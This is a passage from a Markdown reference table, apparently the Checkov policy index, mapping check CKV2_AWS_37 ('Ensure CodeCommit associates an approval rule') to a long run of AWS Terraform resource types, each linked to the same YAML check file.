approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 966 | CKV2_AWS_37 | resource | aws_pinpoint_baidu_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 967 | CKV2_AWS_37 | resource | aws_pinpoint_email_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 968 | CKV2_AWS_37 | resource | aws_pinpoint_event_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 969 | CKV2_AWS_37 | resource | aws_pinpoint_gcm_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 970 | CKV2_AWS_37 | resource | aws_pinpoint_sms_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 971 | CKV2_AWS_37 | resource | aws_placement_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 972 | CKV2_AWS_37 | resource | aws_proxy_protocol_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 973 | CKV2_AWS_37 | resource | aws_qldb_ledger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 974 | CKV2_AWS_37 | resource | aws_quicksight_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 975 | CKV2_AWS_37 | resource | aws_quicksight_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 976 | CKV2_AWS_37 | resource | aws_ram_principal_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 977 | CKV2_AWS_37 | resource | aws_ram_resource_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 978 | CKV2_AWS_37 | resource | aws_ram_resource_share | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 979 | CKV2_AWS_37 | resource | aws_ram_resource_share_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 980 | CKV2_AWS_37 | resource | aws_rds_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 981 | CKV2_AWS_37 | resource | aws_rds_cluster_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 982 | CKV2_AWS_37 | resource | aws_rds_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 983 | CKV2_AWS_37 | resource | aws_rds_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 984 | CKV2_AWS_37 | resource | aws_rds_global_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 985 | CKV2_AWS_37 | resource | aws_redshift_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 986 | CKV2_AWS_37 | resource | aws_redshift_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 987 | CKV2_AWS_37 | resource | aws_redshift_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 988 | CKV2_AWS_37 | resource | aws_redshift_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 989 | CKV2_AWS_37 | resource | aws_redshift_snapshot_copy_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 990 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 991 | CKV2_AWS_37 | resource | aws_redshift_snapshot_schedule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 992 | CKV2_AWS_37 | resource | aws_redshift_subnet_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 993 | CKV2_AWS_37 | resource | aws_resourcegroups_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 994 | CKV2_AWS_37 | resource | aws_root | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 995 | CKV2_AWS_37 | resource | aws_root_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 996 | CKV2_AWS_37 | resource | aws_route | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 997 | CKV2_AWS_37 | resource | aws_route53_delegation_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 998 | CKV2_AWS_37 | resource | aws_route53_health_check | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 999 | CKV2_AWS_37 | resource | aws_route53_query_log | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1000 | CKV2_AWS_37 | resource | aws_route53_record | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1001 | CKV2_AWS_37 | resource | aws_route53_resolver_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1002 | CKV2_AWS_37 | resource | aws_route53_resolver_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1003 | CKV2_AWS_37 | resource | aws_route53_resolver_rule_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1004 | CKV2_AWS_37 | resource | aws_route53_vpc_association_authorization | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1005 | CKV2_AWS_37 | resource | aws_route53_zone | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1006 | CKV2_AWS_37 | resource | aws_route53_zone_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1007 | CKV2_AWS_37 | resource | aws_route_table | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1008 | CKV2_AWS_37 | resource | aws_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1009 | CKV2_AWS_37 | resource | aws_s3_access_point | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1010 | CKV2_AWS_37 | resource | aws_s3_account_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1011 | CKV2_AWS_37 | resource | aws_s3_bucket | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1012 | CKV2_AWS_37 | resource | aws_s3_bucket_analytics_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1013 | CKV2_AWS_37 | resource | aws_s3_bucket_inventory | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1014 | CKV2_AWS_37 | resource | aws_s3_bucket_metric | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1015 | CKV2_AWS_37 | resource | aws_s3_bucket_notification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1016 | CKV2_AWS_37 | resource | aws_s3_bucket_object | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1017 | CKV2_AWS_37 | resource | aws_s3_bucket_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1018 | CKV2_AWS_37 | resource | aws_s3_bucket_public_access_block | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1019 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1020 | CKV2_AWS_37 | resource | aws_sagemaker_endpoint_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1021 | CKV2_AWS_37 | resource | aws_sagemaker_model | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1022 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1023 | CKV2_AWS_37 | resource | aws_sagemaker_notebook_instance_lifecycle_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1024 | CKV2_AWS_37 | resource | aws_secretsmanager_secret | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1025 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_rotation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1026 | CKV2_AWS_37 | resource | aws_secretsmanager_secret_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1027 | CKV2_AWS_37 | resource | aws_security_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1028 | CKV2_AWS_37 | resource | aws_security_group_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1029 | CKV2_AWS_37 | resource | aws_securityhub_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1030 | CKV2_AWS_37 | resource | aws_securityhub_member | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1031 | CKV2_AWS_37 | resource | aws_securityhub_product_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1032 | CKV2_AWS_37 | resource | aws_securityhub_standards_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1033 | CKV2_AWS_37 | resource | aws_service_discovery_http_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1034 | CKV2_AWS_37 | resource | aws_service_discovery_private_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1035 | CKV2_AWS_37 | resource | aws_service_discovery_public_dns_namespace | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1036 | CKV2_AWS_37 | resource | aws_service_discovery_service | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1037 | CKV2_AWS_37 | resource | aws_servicecatalog_portfolio | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1038 | CKV2_AWS_37 | resource | aws_servicequotas_service_quota | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1039 | CKV2_AWS_37 | resource | aws_ses_active_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1040 | CKV2_AWS_37 | resource | aws_ses_configuration_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1041 | CKV2_AWS_37 | resource | aws_ses_domain_dkim | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1042 | CKV2_AWS_37 | resource | aws_ses_domain_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1043 | CKV2_AWS_37 | resource | aws_ses_domain_identity_verification | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1044 | CKV2_AWS_37 | resource | aws_ses_domain_mail_from | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1045 | CKV2_AWS_37 | resource | aws_ses_email_identity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1046 | CKV2_AWS_37 | resource | aws_ses_event_destination | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1047 | CKV2_AWS_37 | resource | aws_ses_identity_notification_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1048 | CKV2_AWS_37 | resource | aws_ses_identity_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1049 | CKV2_AWS_37 | resource | aws_ses_receipt_filter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1050 | CKV2_AWS_37 | resource | aws_ses_receipt_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1051 | CKV2_AWS_37 | resource | aws_ses_receipt_rule_set | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1052 | CKV2_AWS_37 | resource | aws_ses_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1053 | CKV2_AWS_37 | resource | aws_sfn_activity | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1054 | CKV2_AWS_37 | resource | aws_sfn_state_machine | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1055 | CKV2_AWS_37 | resource | aws_shield_protection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1056 | CKV2_AWS_37 | resource | aws_simpledb_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1057 | CKV2_AWS_37 | resource | aws_snapshot_create_volume_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1058 | CKV2_AWS_37 | resource | aws_sns_platform_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1059 | CKV2_AWS_37 | resource | aws_sns_sms_preferences | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1060 | CKV2_AWS_37 | resource | aws_sns_topic | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1061 | CKV2_AWS_37 | resource | aws_sns_topic_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1062 | CKV2_AWS_37 | resource | aws_sns_topic_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1063 | CKV2_AWS_37 | resource | aws_spot_datafeed_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1064 | CKV2_AWS_37 | resource | aws_spot_fleet_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1065 | CKV2_AWS_37 | resource | aws_spot_instance_request | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1066 | CKV2_AWS_37 | resource | aws_sqs_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1067 | CKV2_AWS_37 | resource | aws_sqs_queue_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1068 | CKV2_AWS_37 | resource | aws_ssm_activation | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1069 | CKV2_AWS_37 | resource | aws_ssm_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | -| 1070 | CKV2_AWS_37 | resource | aws_ssm_document | Ensure CodeCommit associates an approval rule | Terraform | 